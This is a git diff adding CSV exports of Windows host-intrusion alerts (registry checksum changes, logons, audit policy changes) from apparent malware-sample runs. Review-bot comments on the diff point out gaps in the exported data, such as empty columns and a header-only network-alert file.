13:07:58.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. 
+Old md5sum was: '041ceda52ac74d2f1c17260400a6ccd7' +New md5sum is : 'b58c019384b3299402dbe5a0e22d2728' +Old sha1sum was: '71b098fd2ebae082d988fdb8ccb8812878a44c57' +New sha1sum is : 'adf5c3a1c0ff6a1ecdcd328f5d2ad52bb15b804a' +", +"Apr 24, 2020 @ 13:07:24.965",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '32e1b6b1065e3ef22843b8e6000b5ef2' +New md5sum is : '0605cdb24f1ff5338bc41392ba73d94f' +Old sha1sum was: '904e5ecf7a5a42f73ad788fd88d72fd51230a9ec' +New sha1sum is : 'f486515c8d4c93497c80cacf50cdf5c398a099e9' +", +"Apr 24, 2020 @ 13:07:21.901",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A3A + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. 
This event can be interpreted as a logoff event.""" +"Apr 24, 2020 @ 13:07:21.309",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:07:21.089",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:07:15.481",5,"Windows System error event",,"""The server Microsoft.Windows.ContentDeliveryManager_10.0.18362.449_neutral_neutral_cw5n1h2txyewy!App.AppXwdz8g2fxr36xz0tdtagygnvemf85s7gg.mca did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 13:04:50.766",4,"Summary event of the report's signatures",,"""Fault bucket 1998781362923138110, type 5 +Event Name: RADAR_PRE_LEAK_64 +Response: Not available +Cab Id: 0 + +Problem signature: +P1: TiWorker.exe +P2: 10.0.18362.772 +P3: 10.0.18363.2.0.0 +P4: +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Users\JOHNWI~1\AppData\Local\Temp\RDRDE6.tmp\empty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE7.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE36.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE73.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE83.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 34968c9b-6f96-4335-b7d4-c016c57719fb +Report Status: 268435456 +Hashed bucket: 3ced26c211921b339bbd190f40b46c3e +Cab Guid: 0""" +"Apr 24, 2020 @ 13:04:47.758",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 13:04:20.660",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:04Z. Reason: RulesEngine."""
diff --git a/data/MW_14_HIDS_3.csv b/data/MW_14_HIDS_3.csv
new file mode 100644
index 0000000..1ba08bc
--- /dev/null
+++ b/data/MW_14_HIDS_3.csv
@@ -0,0 +1,89 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 16:48:50.993",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 22, 2020 @ 16:46:25.178",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '7a6925496501f6eab705d5c7ab038696' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '8bdc84c00ad75f8b65e6fa6eb585f0d689061628' +", +"May 22, 2020 @ 16:46:25.148",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '15a74f51d7a0d4e1ac30c4b6d7d50bc1' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '896016bfa429eaf3f1b7ca668d65033c1814feee' +", +"May 22, 2020 @ 16:45:47.974",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 22, 2020 @ 16:45:40.177",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : 'b80f2e9655feff9c2a5629f979488e11' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'b0d2d800da5377e859b10323361ef497b61aa1e0' +", +"May 22, 2020 @ 16:44:56.391",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 16:44:46.583",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 16:44:11.285",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 16:44:11.270",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: 'b80f2e9655feff9c2a5629f979488e11' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'b0d2d800da5377e859b10323361ef497b61aa1e0' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 16:41:19.765",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 16:40:01.818",8,"Windows Audit Policy changed","""System audit policy was changed. 
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Audit Policy Change:
+ Category: Object Access
+ Subcategory: Handle Manipulation
+ Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030}
+ Changes: Success Added""",,
+"May 22, 2020 @ 16:40:01.771",8,"Windows Audit Policy changed","""System audit policy was changed.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Audit Policy Change:
+ Category: Object Access
+ Subcategory: File System
+ Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030}
+ Changes: Success Added""",,
+"May 22, 2020 @ 16:39:52.210",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: 'a18eb7d2d71c498e6c68f4d4ae0641c7'
+New md5sum is : '496e80acc19637c8daf8c286b6ea10f0'
+Old sha1sum was: '4458c74e5e5b43abcaa686c52ebb00d5149c3406'
+New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+",
+"May 22, 2020 @ 16:39:52.194",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '2dff0dec78c8ef123f08b1e2d23e5734'
+New md5sum is : '89598d32459256342f73e9b832b618dc'
+Old sha1sum was: 'd900f31683f204db3e8408c6a0391eed28337ae9'
+New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643'
+",
diff --git a/data/MW_14_NIDS.csv b/data/MW_14_NIDS.csv
new file mode 100644
index 0000000..03c3de0
--- /dev/null
+++ b/data/MW_14_NIDS.csv
@@ -0,0 +1 @@
+"@timestamp",message,"log.file.path"
diff --git a/data/MW_15_HIDS_1.csv b/data/MW_15_HIDS_1.csv
new file mode 100644
index 0000000..cdf65f5
--- /dev/null
+++ b/data/MW_15_HIDS_1.csv
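Review bot: Every row of this MW_14_HIDS_3 export leaves the `data.win.eventdata.commandLine` column empty, so a reader cannot tell whether no process-creation events were raised during this run or whether the field simply was not populated by the export; a one-line README entry stating which event sources were enabled for the MW_14 run would resolve that ambiguity. The `full_log` and `data.win.system.message` fields span several physical lines inside their quotes, so the 89-line hunk holds far fewer than 89 alerts and line-oriented tools (`wc -l`, `grep -c`) will over-count; consumers should read it with a quote-aware CSV parser. The `d41d8cd98f00b204e9800998ecf8427e` / `da39a3ee5e6b4b0d3255bfef95601890afd80709` values on the Internet Explorer rows are the MD5 and SHA-1 of empty input, so those rows record a key appearing with no content and later being emptied again rather than a content change, which matters if the file is used as ground truth for what the sample modified.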
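Review bot: MW_14_NIDS.csv contains only the header row, so it records an absence of network alerts for this sample without saying why; a header-only export is indistinguishable from a sensor that was down, a capture window that missed the detonation, or a query that matched nothing. A short note in the dataset documentation stating that the sensor was active and the export window covered the run would let an empty file be treated as a true negative rather than an unknown. Its column names (`@timestamp`, `message`, `log.file.path`) also differ from the `timestamp`/`rule.level`/`rule.description` schema of the HIDS files in the same commit, so anyone merging the two sources needs to handle both layouts; that is worth stating alongside the files.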
@@ -0,0 +1,369 @@
+timestamp,"rule.level","rule.description","full_log"
+"Apr 4, 2020 @ 16:41:48.310",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",
+"Apr 4, 2020 @ 16:35:11.398",8,"Windows Audit Policy changed",
+"Apr 4, 2020 @ 16:35:11.414",8,"Windows Audit Policy changed",
+"Apr 4, 2020 @ 16:35:03.940",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '66412b599c9052ba1a1c9e08b7abbe7c'
+New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114'
+Old sha1sum was: '9268e8b2e326583f233d96d8b6fe32e48969274e'
+New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe'
+"
+"Apr 4, 2020 @ 16:35:03.941",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '78e6332dc13f45b431b234040dc6c45a'
+New md5sum is : '93c2f688a68bea92ca0316b543b731f9'
+Old sha1sum was: 'c71a1f75575f97e8ce9571f3ba2fd1e8c4b53f28'
+New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8'
+"
+"Apr 4, 2020 @ 16:37:36.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: 'c07851f8f2e30eb65757347b948170ba'
+New md5sum is : 'f82e4dca8fa64fec2f300e13070576d2'
+Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60'
+New sha1sum is : '6cb808077186c7f926dd8620d24565a1c25f2bed'
+"
+"Apr 4, 2020 @ 16:38:21.302",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed.
+Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 4, 2020 @ 16:38:21.349",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '561278354652120b9564b6a611e33cac' +New md5sum is : '8705f3ab5cf990d6c1ef6bc5b2096f58' +Old sha1sum was: 'ba6bcd0d6357a824c6429cdda85f72e1a281f021' +New sha1sum is : '7d0d0c4a70679750982381e5e9cbe9653ac96737' +" +"Apr 4, 2020 @ 16:38:22.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '4f0b888d9ae2fb8def9aa6fc72cca859' +New md5sum is : '34c422579604f111c84b176ad275c071' +Old sha1sum was: '5f4b058d671d22b61f253bbdb36509e37217ce71' +New sha1sum is : '6e28feeda1028114fd693466085935d9e610cfb9' +" +"Apr 4, 2020 @ 16:38:34.100",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 16:38:34.130",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '98f645d827b038bfbb3a44a8c17a66ff' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '2d81f3892a302534ce0115f4db0ffd4ae3651431' +" +"Apr 4, 2020 @ 16:40:27.202",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 16:40:27.217",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 4, 2020 @ 16:41:41.622",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 16:42:31.556",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"Apr 4, 2020 @ 16:42:42.165",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 4, 2020 @ 16:43:18.229",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : 'd837cb5171b76e59138e023111554c6b' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : 'd43cd851ad83928abaf09042dc3d1bc05fccc844' +" +"Apr 4, 2020 @ 16:43:18.290",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'f82e4dca8fa64fec2f300e13070576d2' +New md5sum is : '2e3466c555e0a3bbbed2d233bddc4ce3' +Old sha1sum was: '6cb808077186c7f926dd8620d24565a1c25f2bed' +New sha1sum is : 'e2b0a3298a8bec9be4ded772855a7a1c8b7c3eff' +" +"Apr 4, 2020 @ 16:43:18.306",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '1eebefebc6b548d658597160f05ab29a' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '1e7aee2c242d9485759621c66805b838ddb88f6b' +" +"Apr 4, 2020 @ 16:43:23.665",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:43:26.415",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4e73781ca94f96529b305e483ab177a3' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'ffdfde7db93ec9a9eeda8bf729e49dc5503d7f1b' +" +"Apr 4, 2020 @ 16:43:35.789",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'a50565eb5ea31fac522e0235eae98a5f' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '227fdbbd4919b9750af3564422e695d446104f93' +" +"Apr 4, 2020 @ 16:43:43.994",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 16:43:44.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. 
+Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:43:45.634",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '9d56a0bc769d18ce9a67ee2c49d46de4' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '6ea3ce8f9b9fd2500d50eb2575c74cb9d1ce7bed' +" +"Apr 4, 2020 @ 16:43:48.244",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:43:49.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '6beea6cc73556c0a7100373a9a84405c' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '18c9b7e997e1b326d9b89cffacc38033497283b5' +" +"Apr 4, 2020 @ 16:43:55.978",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'a83bfa32b3017669d77eb2a8184aab38' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'a37d254f321f43e39850a1673d621dc9dc24c1cd' +" +"Apr 4, 2020 @ 16:43:56.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'fcf1d20da1fca5699efa750b5b7d5afc' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '1b82de12f22bfd2c6e753c01488ae745f1765ebb' +" +"Apr 4, 2020 @ 16:43:58.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '62c6556f67affdb39777191a82841f1a' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'a5837346c9a0ee689d6c15d990ac8c21c9b3a7df' +" +"Apr 4, 2020 @ 16:44:05.619",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 16:44:10.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 4, 2020 @ 16:44:10.103",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 16:44:12.166",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. 
+Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 16:44:16.837",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '0fd732e438748e2bf5d1fb96900c3e25' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '573f5029f5c8c8c783af29fc49c7c868a675c269' +" +"Apr 4, 2020 @ 16:44:18.838",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:44:19.979",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '1b61874c0f3937cf641410502c4e4f04' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'cd4e6b8fcd0dc7a9aa34cd764065cce66325b311' +" +"Apr 4, 2020 @ 16:44:20.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
